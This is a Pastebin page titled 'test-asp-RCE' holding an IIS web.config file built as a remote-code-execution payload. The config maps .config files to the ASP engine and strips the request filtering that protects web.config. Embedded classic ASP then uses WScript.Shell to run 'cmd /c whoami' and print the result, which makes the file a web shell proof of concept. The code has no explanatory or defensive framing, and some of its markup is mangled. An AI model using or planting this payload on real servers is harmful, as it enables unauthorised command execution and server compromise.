daily pastebin goal
82%
SHARE
TWEET

test-asp-RCE

a guest Sep 4th, 2018 98 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <configuration>
  3.     <system.webServer>
  4.         <handlers accessPolicy="Read, Script, Write">
  5.         <add name="web_config" path="*.config" verb="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64"\>
  6.         </handlers>
  7.  
  8.         <security>
  9.             <requestFiltering>
  10.                 <fileExtensions>
  11.                     <remove fileExtension=".config"/>
  12.                 </fileExtensions>
  13.                 <hiddenSegments>
  14.                     <remove segment="web.config"/>
  15.                 </hiddenSegments>
  16.             <requestFiltering>
  17.         </security>
  18.     </system.webServer>
  19.     <appSettings>
  20.     </appSettings>
  21. </configuration>
  22.  
  23. <!-
  24. <% Response.write("-" & "->")
  25. Response.write("</p>
  26. <pre>")</p>
  27. <p>Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  28. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  29. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  30. Function getCommandOutput(theCommand)
  31. Dim objShell, objCmdExec
  32. Set objShell = CreateObject("WScript.Shell")
  33. Set objCmdExec = objshell.exec(thecommand)
  34. getCommandOutput = objCmdExec.StdOut.ReadAll
  35. end Function</p>
  36.  
  37. <p>Response.write(getCommandOutput('cmd /c whoami'))
  38. Response.write("</pre>
  39. </p><!-" & "-")%>
  40. ->
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top